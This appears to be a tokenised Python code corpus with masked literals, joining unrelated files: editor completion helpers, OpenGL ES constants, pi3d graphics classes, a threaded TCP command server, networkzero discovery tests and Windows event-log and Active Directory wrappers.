[ ] <EOL> for element in l_list : <EOL> if not element [ <NUM_LIT:3> ] : <EOL> l_not_obsolete_feature . 
append ( element ) <EOL> if l_not_obsolete_feature : <EOL> matches = match_list_feature ( l_not_obsolete_feature , a_base ) <EOL> else : <EOL> l_list = a_project . feature_list ( get_class_from_buffer ( a_project ) ) <EOL> l_list . extend ( get_local_variable ( a_project ) ) <EOL> l_list . extend ( get_result_and_arguments ( a_project ) ) <EOL> matches = match_list_feature ( l_list , a_base ) <EOL> matches . sort ( key = lambda mbr : mbr . lower ( ) ) <EOL> result = "<STR_LIT:[>" <EOL> is_first = True <EOL> for match in matches : <EOL> if is_first : <EOL> result = result + "<STR_LIT>" + match + "<STR_LIT>" <EOL> is_first = False <EOL> else : <EOL> result = result + "<STR_LIT>" + match + "<STR_LIT>" <EOL> result = result + "<STR_LIT:]>" <EOL> return result <EOL> def complete_creator_match ( a_project , a_base ) : <EOL> """<STR_LIT>""" <EOL> matches = [ ] <EOL> if is_cursor_on_client_call ( ) : <EOL> l_features = a_project . feature_list ( get_class_from_buffer ( a_project ) ) <EOL> l_features . extend ( get_local_variable ( a_project ) ) <EOL> l_features . extend ( get_result_and_arguments ( a_project ) ) <EOL> l_stack = create_row_object_stack ( ) <EOL> if l_stack : <EOL> l_index = index_of_key_in_pair ( l_stack [ <NUM_LIT:0> ] , l_features ) <EOL> if l_index >= <NUM_LIT:0> : <EOL> l_class = l_features [ l_index ] [ <NUM_LIT:1> ] <EOL> if l_class : <EOL> matches = match_list_feature ( <EOL> a_project . creators_list ( l_class ) , a_base ) <EOL> matches . sort ( key = lambda mbr : mbr . lower ( ) ) <EOL> result = "<STR_LIT:[>" <EOL> is_first = True <EOL> for match in matches : <EOL> if is_first : <EOL> result = result + "<STR_LIT>" + match + "<STR_LIT>" <EOL> is_first = False <EOL> else : <EOL> result = result + "<STR_LIT>" + match + "<STR_LIT>" <EOL> result = result + "<STR_LIT:]>" <EOL> return result </s>
<s> """<STR_LIT>""" <EOL> GL_ETC1_RGB8_OES = <NUM_LIT> <EOL> GL_PALETTE4_RGB8_OES = <NUM_LIT> <EOL> GL_PALETTE4_RGBA8_OES = <NUM_LIT> <EOL> GL_PALETTE4_R5_G6_B5_OES = <NUM_LIT> <EOL> GL_PALETTE4_RGBA4_OES = <NUM_LIT> <EOL> GL_PALETTE4_RGB5_A1_OES = <NUM_LIT> <EOL> GL_PALETTE8_RGB8_OES = <NUM_LIT> <EOL> GL_PALETTE8_RGBA8_OES = <NUM_LIT> <EOL> GL_PALETTE8_R5_G6_B5_OES = <NUM_LIT> <EOL> GL_PALETTE8_RGBA4_OES = <NUM_LIT> <EOL> GL_PALETTE8_RGB5_A1_OES = <NUM_LIT> <EOL> GL_DEPTH_COMPONENT24_OES = <NUM_LIT> <EOL> GL_DEPTH_COMPONENT32_OES = <NUM_LIT> <EOL> GL_TEXTURE_EXTERNAL_OES = <NUM_LIT> <EOL> GL_SAMPLER_EXTERNAL_OES = <NUM_LIT> <EOL> GL_TEXTURE_BINDING_EXTERNAL_OES = <NUM_LIT> <EOL> GL_REQUIRED_TEXTURE_IMAGE_UNITS_OES = <NUM_LIT> <EOL> GL_UNSIGNED_INT = <NUM_LIT> <EOL> GL_PROGRAM_BINARY_LENGTH_OES = <NUM_LIT> <EOL> GL_NUM_PROGRAM_BINARY_FORMATS_OES = <NUM_LIT> <EOL> GL_PROGRAM_BINARY_FORMATS_OES = <NUM_LIT> <EOL> GL_WRITE_ONLY_OES = <NUM_LIT> <EOL> GL_BUFFER_ACCESS_OES = <NUM_LIT> <EOL> GL_BUFFER_MAPPED_OES = <NUM_LIT> <EOL> GL_BUFFER_MAP_POINTER_OES = <NUM_LIT> <EOL> GL_DEPTH_STENCIL_OES = <NUM_LIT> <EOL> GL_UNSIGNED_INT_24_8_OES = <NUM_LIT> <EOL> GL_DEPTH24_STENCIL8_OES = <NUM_LIT> <EOL> GL_RGB8_OES = <NUM_LIT> <EOL> GL_RGBA8_OES = <NUM_LIT> <EOL> GL_FRAGMENT_SHADER_DERIVATIVE_HINT_OES = <NUM_LIT> <EOL> GL_STENCIL_INDEX1_OES = <NUM_LIT> <EOL> GL_STENCIL_INDEX4_OES = <NUM_LIT> <EOL> GL_TEXTURE_WRAP_R_OES = <NUM_LIT> <EOL> GL_TEXTURE_3D_OES = <NUM_LIT> <EOL> GL_TEXTURE_BINDING_3D_OES = <NUM_LIT> <EOL> GL_MAX_3D_TEXTURE_SIZE_OES = <NUM_LIT> <EOL> GL_SAMPLER_3D_OES = <NUM_LIT> <EOL> GL_FRAMEBUFFER_ATTACHMENT_TEXTURE_3D_ZOFFSET_OES = <NUM_LIT> <EOL> GL_HALF_FLOAT_OES = <NUM_LIT> <EOL> GL_VERTEX_ARRAY_BINDING_OES = <NUM_LIT> <EOL> GL_UNSIGNED_INT_10_10_10_2_OES = <NUM_LIT> <EOL> GL_INT_10_10_10_2_OES = <NUM_LIT> <EOL> GL_3DC_X_AMD = <NUM_LIT> <EOL> GL_3DC_XY_AMD = <NUM_LIT> <EOL> GL_ATC_RGB_AMD = <NUM_LIT> <EOL> GL_ATC_RGBA_EXPLICIT_ALPHA_AMD = <NUM_LIT> <EOL> 
GL_ATC_RGBA_INTERPOLATED_ALPHA_AMD = <NUM_LIT> <EOL> GL_COUNTER_TYPE_AMD = <NUM_LIT> <EOL> GL_COUNTER_RANGE_AMD = <NUM_LIT> <EOL> GL_UNSIGNED_INT64_AMD = <NUM_LIT> <EOL> GL_PERCENTAGE_AMD = <NUM_LIT> <EOL> GL_PERFMON_RESULT_AVAILABLE_AMD = <NUM_LIT> <EOL> GL_PERFMON_RESULT_SIZE_AMD = <NUM_LIT> <EOL> GL_PERFMON_RESULT_AMD = <NUM_LIT> <EOL> GL_Z400_BINARY_AMD = <NUM_LIT> <EOL> GL_READ_FRAMEBUFFER_ANGLE = <NUM_LIT> <EOL> GL_DRAW_FRAMEBUFFER_ANGLE = <NUM_LIT> <EOL> GL_DRAW_FRAMEBUFFER_BINDING_ANGLE = <NUM_LIT> <EOL> GL_READ_FRAMEBUFFER_BINDING_ANGLE = <NUM_LIT> <EOL> GL_RENDERBUFFER_SAMPLES_ANGLE = <NUM_LIT> <EOL> GL_FRAMEBUFFER_INCOMPLETE_MULTISAMPLE_ANGLE = <NUM_LIT> <EOL> GL_MAX_SAMPLES_ANGLE = <NUM_LIT> <EOL> GL_RGB_422_APPLE = <NUM_LIT> <EOL> GL_UNSIGNED_SHORT_8_8_APPLE = <NUM_LIT> <EOL> GL_UNSIGNED_SHORT_8_8_REV_APPLE = <NUM_LIT> <EOL> GL_RENDERBUFFER_SAMPLES_APPLE = <NUM_LIT> <EOL> GL_FRAMEBUFFER_INCOMPLETE_MULTISAMPLE_APPLE = <NUM_LIT> <EOL> GL_MAX_SAMPLES_APPLE = <NUM_LIT> <EOL> GL_READ_FRAMEBUFFER_APPLE = <NUM_LIT> <EOL> GL_DRAW_FRAMEBUFFER_APPLE = <NUM_LIT> <EOL> GL_DRAW_FRAMEBUFFER_BINDING_APPLE = <NUM_LIT> <EOL> GL_READ_FRAMEBUFFER_BINDING_APPLE = <NUM_LIT> <EOL> GL_BGRA_EXT = <NUM_LIT> <EOL> GL_TEXTURE_MAX_LEVEL_APPLE = <NUM_LIT> <EOL> GL_MALI_SHADER_BINARY_ARM = <NUM_LIT> <EOL> GL_MIN_EXT = <NUM_LIT> <EOL> GL_MAX_EXT = <NUM_LIT> <EOL> GL_COLOR_EXT = <NUM_LIT> <EOL> GL_DEPTH_EXT = <NUM_LIT> <EOL> GL_STENCIL_EXT = <NUM_LIT> <EOL> GL_BGRA_EXT = <NUM_LIT> <EOL> GL_UNSIGNED_SHORT_4_4_4_4_REV_EXT = <NUM_LIT> <EOL> GL_UNSIGNED_SHORT_1_5_5_5_REV_EXT = <NUM_LIT> <EOL> GL_TEXTURE_MAX_ANISOTROPY_EXT = <NUM_LIT> <EOL> GL_MAX_TEXTURE_MAX_ANISOTROPY_EXT = <NUM_LIT> <EOL> GL_BGRA_EXT = <NUM_LIT> <EOL> GL_UNSIGNED_INT_2_10_10_10_REV_EXT = <NUM_LIT> <EOL> GL_COMPRESSED_RGB_S3TC_DXT1_EXT = <NUM_LIT> <EOL> GL_COMPRESSED_RGBA_S3TC_DXT1_EXT = <NUM_LIT> <EOL> GL_UNPACK_ROW_LENGTH = <NUM_LIT> <EOL> GL_UNPACK_SKIP_ROWS = <NUM_LIT> <EOL> GL_UNPACK_SKIP_PIXELS = <NUM_LIT> <EOL> 
GL_SHADER_BINARY_DMP = <NUM_LIT> <EOL> GL_SGX_PROGRAM_BINARY_IMG = <NUM_LIT> <EOL> GL_BGRA_IMG = <NUM_LIT> <EOL> GL_UNSIGNED_SHORT_4_4_4_4_REV_IMG = <NUM_LIT> <EOL> GL_SGX_BINARY_IMG = <NUM_LIT> <EOL> GL_COMPRESSED_RGB_PVRTC_4BPPV1_IMG = <NUM_LIT> <EOL> GL_COMPRESSED_RGB_PVRTC_2BPPV1_IMG = <NUM_LIT> <EOL> GL_COMPRESSED_RGBA_PVRTC_4BPPV1_IMG = <NUM_LIT> <EOL> GL_COMPRESSED_RGBA_PVRTC_2BPPV1_IMG = <NUM_LIT> <EOL> GL_RENDERBUFFER_SAMPLES_IMG = <NUM_LIT> <EOL> GL_FRAMEBUFFER_INCOMPLETE_MULTISAMPLE_IMG = <NUM_LIT> <EOL> GL_MAX_SAMPLES_IMG = <NUM_LIT> <EOL> GL_TEXTURE_SAMPLES_IMG = <NUM_LIT> <EOL> GL_COVERAGE_COMPONENT_NV = <NUM_LIT> <EOL> GL_COVERAGE_COMPONENT4_NV = <NUM_LIT> <EOL> GL_COVERAGE_ATTACHMENT_NV = <NUM_LIT> <EOL> GL_COVERAGE_BUFFERS_NV = <NUM_LIT> <EOL> GL_COVERAGE_SAMPLES_NV = <NUM_LIT> <EOL> GL_COVERAGE_ALL_FRAGMENTS_NV = <NUM_LIT> <EOL> GL_COVERAGE_EDGE_FRAGMENTS_NV = <NUM_LIT> <EOL> GL_COVERAGE_AUTOMATIC_NV = <NUM_LIT> <EOL> GL_COVERAGE_BUFFER_BIT_NV = <NUM_LIT> <EOL> GL_DEPTH_COMPONENT16_NONLINEAR_NV = <NUM_LIT> <EOL> GL_MAX_DRAW_BUFFERS_NV = <NUM_LIT> <EOL> GL_DRAW_BUFFER0_NV = <NUM_LIT> <EOL> GL_DRAW_BUFFER1_NV = <NUM_LIT> <EOL> GL_DRAW_BUFFER2_NV = <NUM_LIT> <EOL> GL_DRAW_BUFFER3_NV = <NUM_LIT> <EOL> GL_DRAW_BUFFER4_NV = <NUM_LIT> <EOL> GL_DRAW_BUFFER5_NV = <NUM_LIT> <EOL> GL_DRAW_BUFFER6_NV = <NUM_LIT> <EOL> GL_DRAW_BUFFER7_NV = <NUM_LIT> <EOL> GL_DRAW_BUFFER8_NV = <NUM_LIT> <EOL> GL_DRAW_BUFFER9_NV = <NUM_LIT> <EOL> GL_DRAW_BUFFER10_NV = <NUM_LIT> <EOL> GL_DRAW_BUFFER11_NV = <NUM_LIT> <EOL> GL_DRAW_BUFFER12_NV = <NUM_LIT> <EOL> GL_DRAW_BUFFER13_NV = <NUM_LIT> <EOL> GL_DRAW_BUFFER14_NV = <NUM_LIT> <EOL> GL_DRAW_BUFFER15_NV = <NUM_LIT> <EOL> GL_COLOR_ATTACHMENT0_NV = <NUM_LIT> <EOL> GL_COLOR_ATTACHMENT1_NV = <NUM_LIT> <EOL> GL_COLOR_ATTACHMENT2_NV = <NUM_LIT> <EOL> GL_COLOR_ATTACHMENT3_NV = <NUM_LIT> <EOL> GL_COLOR_ATTACHMENT4_NV = <NUM_LIT> <EOL> GL_COLOR_ATTACHMENT5_NV = <NUM_LIT> <EOL> GL_COLOR_ATTACHMENT6_NV = <NUM_LIT> <EOL> 
GL_COLOR_ATTACHMENT7_NV = <NUM_LIT> <EOL> GL_COLOR_ATTACHMENT8_NV = <NUM_LIT> <EOL> GL_COLOR_ATTACHMENT9_NV = <NUM_LIT> <EOL> GL_COLOR_ATTACHMENT10_NV = <NUM_LIT> <EOL> GL_COLOR_ATTACHMENT11_NV = <NUM_LIT> <EOL> GL_COLOR_ATTACHMENT12_NV = <NUM_LIT> <EOL> GL_COLOR_ATTACHMENT13_NV = <NUM_LIT> <EOL> GL_COLOR_ATTACHMENT14_NV = <NUM_LIT> <EOL> GL_COLOR_ATTACHMENT15_NV = <NUM_LIT> <EOL> GL_MAX_COLOR_ATTACHMENTS_NV = <NUM_LIT> <EOL> GL_ALL_COMPLETED_NV = <NUM_LIT> <EOL> GL_FENCE_STATUS_NV = <NUM_LIT> <EOL> GL_FENCE_CONDITION_NV = <NUM_LIT> <EOL> GL_READ_BUFFER_NV = <NUM_LIT> <EOL> GL_ALPHA_TEST_QCOM = <NUM_LIT> <EOL> GL_ALPHA_TEST_FUNC_QCOM = <NUM_LIT> <EOL> GL_ALPHA_TEST_REF_QCOM = <NUM_LIT> <EOL> GL_TEXTURE_WIDTH_QCOM = <NUM_LIT> <EOL> GL_TEXTURE_HEIGHT_QCOM = <NUM_LIT> <EOL> GL_TEXTURE_DEPTH_QCOM = <NUM_LIT> <EOL> GL_TEXTURE_INTERNAL_FORMAT_QCOM = <NUM_LIT> <EOL> GL_TEXTURE_FORMAT_QCOM = <NUM_LIT> <EOL> GL_TEXTURE_TYPE_QCOM = <NUM_LIT> <EOL> GL_TEXTURE_IMAGE_VALID_QCOM = <NUM_LIT> <EOL> GL_TEXTURE_NUM_LEVELS_QCOM = <NUM_LIT> <EOL> GL_TEXTURE_TARGET_QCOM = <NUM_LIT> <EOL> GL_TEXTURE_OBJECT_VALID_QCOM = <NUM_LIT> <EOL> GL_STATE_RESTORE = <NUM_LIT> <EOL> GL_PERFMON_GLOBAL_MODE_QCOM = <NUM_LIT> <EOL> GL_WRITEONLY_RENDERING_QCOM = <NUM_LIT> <EOL> GL_COLOR_BUFFER_BIT0_QCOM = <NUM_LIT> <EOL> GL_COLOR_BUFFER_BIT1_QCOM = <NUM_LIT> <EOL> GL_COLOR_BUFFER_BIT2_QCOM = <NUM_LIT> <EOL> GL_COLOR_BUFFER_BIT3_QCOM = <NUM_LIT> <EOL> GL_COLOR_BUFFER_BIT4_QCOM = <NUM_LIT> <EOL> GL_COLOR_BUFFER_BIT5_QCOM = <NUM_LIT> <EOL> GL_COLOR_BUFFER_BIT6_QCOM = <NUM_LIT> <EOL> GL_COLOR_BUFFER_BIT7_QCOM = <NUM_LIT> <EOL> GL_DEPTH_BUFFER_BIT0_QCOM = <NUM_LIT> <EOL> GL_DEPTH_BUFFER_BIT1_QCOM = <NUM_LIT> <EOL> GL_DEPTH_BUFFER_BIT2_QCOM = <NUM_LIT> <EOL> GL_DEPTH_BUFFER_BIT3_QCOM = <NUM_LIT> <EOL> GL_DEPTH_BUFFER_BIT4_QCOM = <NUM_LIT> <EOL> GL_DEPTH_BUFFER_BIT5_QCOM = <NUM_LIT> <EOL> GL_DEPTH_BUFFER_BIT6_QCOM = <NUM_LIT> <EOL> GL_DEPTH_BUFFER_BIT7_QCOM = <NUM_LIT> <EOL> GL_STENCIL_BUFFER_BIT0_QCOM = 
<NUM_LIT> <EOL> GL_STENCIL_BUFFER_BIT1_QCOM = <NUM_LIT> <EOL> GL_STENCIL_BUFFER_BIT2_QCOM = <NUM_LIT> <EOL> GL_STENCIL_BUFFER_BIT3_QCOM = <NUM_LIT> <EOL> GL_STENCIL_BUFFER_BIT4_QCOM = <NUM_LIT> <EOL> GL_STENCIL_BUFFER_BIT5_QCOM = <NUM_LIT> <EOL> GL_STENCIL_BUFFER_BIT6_QCOM = <NUM_LIT> <EOL> GL_STENCIL_BUFFER_BIT7_QCOM = <NUM_LIT> <EOL> GL_MULTISAMPLE_BUFFER_BIT0_QCOM = <NUM_LIT> <EOL> GL_MULTISAMPLE_BUFFER_BIT1_QCOM = <NUM_LIT> <EOL> GL_MULTISAMPLE_BUFFER_BIT2_QCOM = <NUM_LIT> <EOL> GL_MULTISAMPLE_BUFFER_BIT3_QCOM = <NUM_LIT> <EOL> GL_MULTISAMPLE_BUFFER_BIT4_QCOM = <NUM_LIT> <EOL> GL_MULTISAMPLE_BUFFER_BIT5_QCOM = <NUM_LIT> <EOL> GL_MULTISAMPLE_BUFFER_BIT6_QCOM = <NUM_LIT> <EOL> GL_MULTISAMPLE_BUFFER_BIT7_QCOM = <NUM_LIT> <EOL> GL_SHADER_BINARY_VIV = <NUM_LIT> </s>
<s> from __future__ import absolute_import , division , print_function , unicode_literals <EOL> from pi3d . constants import * <EOL> from pi3d . Buffer import Buffer <EOL> from pi3d . Shape import Shape <EOL> class Lines ( Shape ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , camera = None , light = None , vertices = [ ] , material = ( <NUM_LIT:1.0> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> line_width = <NUM_LIT:1> , closed = False , name = "<STR_LIT>" , x = <NUM_LIT:0.0> , y = <NUM_LIT:0.0> , z = <NUM_LIT:0.0> , <EOL> sx = <NUM_LIT:1.0> , sy = <NUM_LIT:1.0> , sz = <NUM_LIT:1.0> , rx = <NUM_LIT:0.0> , ry = <NUM_LIT:0.0> , rz = <NUM_LIT:0.0> , <EOL> cx = <NUM_LIT:0.0> , cy = <NUM_LIT:0.0> , cz = <NUM_LIT:0.0> , strip = True ) : <EOL> """<STR_LIT>""" <EOL> super ( Lines , self ) . __init__ ( camera , light , name , x , y , z , rx , ry , rz , <EOL> sx , sy , sz , cx , cy , cz ) <EOL> if VERBOSE : <EOL> print ( "<STR_LIT>" ) <EOL> self . vertices = vertices <EOL> self . normals = [ ] <EOL> n_v = len ( vertices ) <EOL> self . indices = [ [ a , a + <NUM_LIT:1> , a + <NUM_LIT:2> ] for a in range ( <NUM_LIT:0> , n_v , <NUM_LIT:3> ) ] <EOL> for i in range ( <NUM_LIT:1> , <NUM_LIT:3> ) : <EOL> last = self . indices [ - <NUM_LIT:1> ] <EOL> if last [ i ] >= n_v : <EOL> last [ i ] = n_v - <NUM_LIT:1> <EOL> self . tex_coords = [ ] <EOL> self . buf = [ Buffer ( self , self . vertices , self . tex_coords , self . indices , <EOL> self . normals , smooth = False ) ] <EOL> if line_width < <NUM_LIT:1> : <EOL> self . set_line_width ( <NUM_LIT:1> , closed ) <EOL> else : <EOL> self . set_line_width ( line_width = line_width , closed = closed , strip = strip ) <EOL> self . set_material ( material ) </s>
<s> import ctypes <EOL> import numpy as np <EOL> from PIL import ImageDraw <EOL> from pi3d . constants import * <EOL> from pi3d . Texture import Texture <EOL> import sys <EOL> if sys . version_info [ <NUM_LIT:0> ] == <NUM_LIT:3> : <EOL> unichr = chr <EOL> class Pngfont ( Texture ) : <EOL> def __init__ ( self , font , color = ( <NUM_LIT:255> , <NUM_LIT:255> , <NUM_LIT:255> , <NUM_LIT:255> ) ) : <EOL> """<STR_LIT>""" <EOL> if not font . endswith ( '<STR_LIT>' ) : <EOL> font += '<STR_LIT>' <EOL> super ( Pngfont , self ) . __init__ ( font ) <EOL> pixels = self . im . load ( ) <EOL> self . glyph_table = { } <EOL> for v in range ( <NUM_LIT> ) : <EOL> x = ( pixels [ v * <NUM_LIT:2> , <NUM_LIT:0> ] [ <NUM_LIT:0> ] * <NUM_LIT> ) / self . ix <EOL> y = ( ( pixels [ v * <NUM_LIT:2> , <NUM_LIT:0> ] [ <NUM_LIT:1> ] + <NUM_LIT:8> ) * <NUM_LIT> ) / self . iy <EOL> width = float ( pixels [ v * <NUM_LIT:2> + <NUM_LIT:1> , <NUM_LIT:0> ] [ <NUM_LIT:0> ] ) <EOL> height = float ( pixels [ v * <NUM_LIT:2> + <NUM_LIT:1> , <NUM_LIT:0> ] [ <NUM_LIT:1> ] ) <EOL> width_scale = width / self . ix <EOL> height_scale = height / self . iy <EOL> self . glyph_table [ unichr ( v + <NUM_LIT:32> ) ] = [ width , height , <EOL> [ ( x + width_scale , y - height_scale ) , <EOL> ( x , y - height_scale ) , <EOL> ( x , y ) , <EOL> ( x + width_scale , y ) ] , <EOL> [ ( width , <NUM_LIT:0> , <NUM_LIT:0> ) , ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ) , ( <NUM_LIT:0> , - height , <NUM_LIT:0> ) , ( width , - height , <NUM_LIT:0> ) ] ] <EOL> self . height = height <EOL> alph = self . im . split ( ) [ - <NUM_LIT:1> ] <EOL> draw = ImageDraw . Draw ( self . im ) <EOL> draw . rectangle ( ( <NUM_LIT:0> , <NUM_LIT:1> , self . ix , self . iy ) , fill = color ) <EOL> self . im . putalpha ( alph ) <EOL> RGBs = '<STR_LIT>' <EOL> self . im = self . im . convert ( RGBs ) <EOL> self . image = np . array ( self . im ) <EOL> self . _tex = ctypes . c_int ( ) </s>
<s> import logging <EOL> try : <EOL> import socketserver <EOL> except ImportError : <EOL> import SocketServer as socketserver <EOL> import static <EOL> class ThreadedServer ( socketserver . ThreadingTCPServer ) : <EOL> allow_reuse_address = <NUM_LIT:1> <EOL> def __init__ ( self , server_address , request_handler_class ) : <EOL> tcp_server = socketserver . ThreadingTCPServer . __init__ <EOL> tcp_server ( self , server_address , request_handler_class ) <EOL> self . cmds = [ ] <EOL> self . logger = logging . getLogger ( '<STR_LIT:default>' ) <EOL> def serve ( self ) : <EOL> self . serve_forever ( ) <EOL> def add_callback ( self , cmd , callback ) : <EOL> self . cmds += [ ( cmd , callback ) ] <EOL> class RequestHandler ( socketserver . StreamRequestHandler ) : <EOL> def handle ( self ) : <EOL> banner_params = ( static . fqdn , static . name , static . version ) <EOL> self . wfile . write ( '<STR_LIT>' % banner_params ) <EOL> while <NUM_LIT:1> : <EOL> unknown_cmd = True <EOL> line = self . rfile . readline ( ) . rstrip ( ) <EOL> if not line : <EOL> break <EOL> spaced = line . split ( '<STR_LIT:U+0020>' ) <EOL> cmd = spaced [ <NUM_LIT:0> ] <EOL> if len ( spaced ) > <NUM_LIT:1> : <EOL> args = spaced [ <NUM_LIT:1> : ] <EOL> else : <EOL> args = None <EOL> if cmd == '<STR_LIT>' : <EOL> break <EOL> for item in self . server . cmds : <EOL> if cmd == item [ <NUM_LIT:0> ] : <EOL> unknown_cmd = False <EOL> item [ <NUM_LIT:1> ] ( self , args ) <EOL> break <EOL> if unknown_cmd : <EOL> self . wfile . write ( '<STR_LIT>' + cmd + '<STR_LIT:\n>' ) <EOL> def setup ( self ) : <EOL> socketserver . StreamRequestHandler . setup ( self ) <EOL> host = self . client_address [ <NUM_LIT:0> ] <EOL> port = str ( self . client_address [ <NUM_LIT:1> ] ) <EOL> self . server . logger . info ( host + '<STR_LIT::>' + port + '<STR_LIT>' ) <EOL> def finish ( self ) : <EOL> socketserver . StreamRequestHandler . finish ( self ) <EOL> host = self . client_address [ <NUM_LIT:0> ] <EOL> port = str ( self . 
client_address [ <NUM_LIT:1> ] ) <EOL> self . server . logger . info ( host + '<STR_LIT::>' + port + '<STR_LIT>' ) </s>
<s> try : <EOL> import queue <EOL> except ImportError : <EOL> import Queue as queue <EOL> import re <EOL> import threading <EOL> import time <EOL> import uuid <EOL> import pytest <EOL> import networkzero as nw0 <EOL> _logger = nw0 . core . get_logger ( "<STR_LIT>" ) <EOL> nw0 . core . _enable_debug_logging ( ) <EOL> is_valid_ip = nw0 . core . is_valid_ip <EOL> is_valid_port = nw0 . core . is_valid_port <EOL> is_valid_address = nw0 . core . is_valid_address <EOL> class SupportThread ( threading . Thread ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , context ) : <EOL> threading . Thread . __init__ ( self ) <EOL> self . context = context <EOL> self . queue = queue . Queue ( ) <EOL> self . setDaemon ( True ) <EOL> def run ( self ) : <EOL> try : <EOL> while True : <EOL> test_name , args = self . queue . get ( ) <EOL> if test_name is None : <EOL> break <EOL> function = getattr ( self , "<STR_LIT>" + test_name ) <EOL> function ( * args ) <EOL> except : <EOL> _logger . exception ( "<STR_LIT>" ) <EOL> def support_test_discover_before_advertise ( self , service ) : <EOL> time . sleep ( <NUM_LIT:1> ) <EOL> nw0 . advertise ( service ) <EOL> @ pytest . fixture <EOL> def support ( request ) : <EOL> thread = SupportThread ( nw0 . sockets . context ) <EOL> def finalise ( ) : <EOL> thread . queue . put ( ( None , None ) ) <EOL> thread . join ( ) <EOL> thread . start ( ) <EOL> return thread <EOL> @ pytest . fixture <EOL> def beacon ( request ) : <EOL> nw0 . discovery . reset_beacon ( ) <EOL> def test_advertise_no_address ( beacon ) : <EOL> service = uuid . uuid4 ( ) . hex <EOL> address = nw0 . advertise ( service ) <EOL> assert is_valid_address ( address ) <EOL> assert [ service , address ] in nw0 . discover_all ( ) <EOL> def test_advertise_no_port ( beacon ) : <EOL> service = uuid . uuid4 ( ) . hex <EOL> address = nw0 . advertise ( service ) <EOL> assert is_valid_address ( address , port_range = nw0 . config . DYNAMIC_PORTS ) <EOL> assert [ service , address ] in nw0 . 
discover_all ( ) <EOL> def test_advertise_full_address ( beacon ) : <EOL> service = uuid . uuid4 ( ) . hex <EOL> service_address = "<STR_LIT>" <EOL> address = nw0 . advertise ( service , service_address ) <EOL> assert address == service_address <EOL> assert [ service , address ] in nw0 . discover_all ( ) <EOL> def test_discover ( beacon ) : <EOL> service = uuid . uuid4 ( ) . hex <EOL> address = nw0 . advertise ( service ) <EOL> assert address == nw0 . discover ( service ) <EOL> def test_discover_not_exists_with_timeout ( beacon ) : <EOL> service = uuid . uuid4 ( ) . hex <EOL> address = nw0 . advertise ( service ) <EOL> assert None is nw0 . discover ( uuid . uuid4 ( ) . hex , wait_for_s = <NUM_LIT:2> ) <EOL> def test_discover_exists_with_timeout ( beacon ) : <EOL> service = uuid . uuid4 ( ) . hex <EOL> address = nw0 . advertise ( service ) <EOL> assert address == nw0 . discover ( service , wait_for_s = <NUM_LIT:2> ) <EOL> def test_discover_all ( beacon ) : <EOL> service1 = uuid . uuid4 ( ) . hex <EOL> address1 = nw0 . advertise ( service1 ) <EOL> service2 = uuid . uuid4 ( ) . hex <EOL> address2 = nw0 . advertise ( service2 ) <EOL> services = dict ( nw0 . discover_all ( ) ) <EOL> assert services == { service1 : address1 , service2 : address2 } <EOL> def test_discover_before_advertise ( beacon , support ) : <EOL> service1 = uuid . uuid4 ( ) . hex <EOL> support . queue . put ( ( "<STR_LIT>" , [ service1 ] ) ) <EOL> address1 = nw0 . discover ( service1 , wait_for_s = <NUM_LIT:5> ) <EOL> assert address1 is not None <EOL> def test_discover_group ( beacon ) : <EOL> group = uuid . uuid4 ( ) . hex <EOL> service1 = "<STR_LIT>" % ( group , uuid . uuid4 ( ) . hex ) <EOL> service2 = "<STR_LIT>" % ( group , uuid . uuid4 ( ) . hex ) <EOL> service3 = "<STR_LIT>" % ( uuid . uuid4 ( ) . hex , uuid . uuid4 ( ) . hex ) <EOL> address1 = nw0 . advertise ( service1 ) <EOL> address2 = nw0 . advertise ( service2 ) <EOL> address3 = nw0 . advertise ( service3 ) <EOL> discovered_group = nw0 . 
discover_group ( group ) <EOL> assert set ( discovered_group ) == set ( [ ( service1 , address1 ) , ( service2 , address2 ) ] ) </s>
<s> from winsys import event_logs <EOL> try : <EOL> source = event_logs . event_source ( "<STR_LIT>" ) <EOL> except event_logs . x_not_found : <EOL> source = event_logs . EventSource . create ( "<STR_LIT>" ) <EOL> try : <EOL> source . log_event ( type = "<STR_LIT>" , message = "<STR_LIT>" ) <EOL> finally : <EOL> source . delete ( ) </s>
<s> from __future__ import unicode_literals <EOL> import os , sys <EOL> import re <EOL> import pythoncom <EOL> import win32com . client <EOL> from win32com . adsi import adsi , adsicon <EOL> from winsys import constants , core , exc , utils <EOL> """<STR_LIT>""" <EOL> class x_active_directory ( exc . x_winsys ) : <EOL> "<STR_LIT>" <EOL> SEARCHPREF = constants . Constants . from_pattern ( "<STR_LIT>" , namespace = adsicon ) <EOL> SEARCHPREF . doc ( "<STR_LIT>" ) <EOL> SCOPE = constants . Constants . from_pattern ( "<STR_LIT>" , namespace = adsicon ) <EOL> SCOPE . doc ( "<STR_LIT>" ) <EOL> WINERROR_MAP = { <EOL> adsicon . E_ADS_COLUMN_NOT_SET : exc . x_not_found , <EOL> <NUM_LIT> : AttributeError <EOL> } <EOL> wrapped = exc . wrapper ( WINERROR_MAP , x_active_directory ) <EOL> SEARCH_PREFERENCES = { <EOL> SEARCHPREF . PAGESIZE : <NUM_LIT:1000> , <EOL> SEARCHPREF . SEARCH_SCOPE : SCOPE . SUBTREE , <EOL> } <EOL> class Result ( dict ) : <EOL> def __getattr__ ( self , attr ) : <EOL> return self [ attr ] <EOL> ESCAPED_CHARACTERS = dict ( ( special , r"<STR_LIT>" % ord ( special ) ) for special in "<STR_LIT>" ) <EOL> def escaped ( s ) : <EOL> for original , escape in ESCAPED_CHARACTERS . items ( ) : <EOL> s = s . replace ( original , escape ) <EOL> return s <EOL> class IADs ( core . _WinSysObject ) : <EOL> def __init__ ( self , obj , interface = adsi . IID_IADs ) : <EOL> self . _obj = wrapped ( obj . QueryInterface , interface ) <EOL> def __getattr__ ( self , attr ) : <EOL> try : <EOL> return getattr ( self . _obj , attr ) <EOL> except AttributeError : <EOL> return wrapped ( self . _obj . Get , attr ) <EOL> def __getitem__ ( self , item ) : <EOL> return self . __class__ . from_object ( <EOL> self . _obj . QueryInterface ( <EOL> adsi . IID_IADsContainer <EOL> ) . GetObject ( <EOL> None , <EOL> item <EOL> ) <EOL> ) <EOL> def pyobject ( self ) : <EOL> return self . _obj <EOL> def as_string ( self ) : <EOL> return self . _obj . 
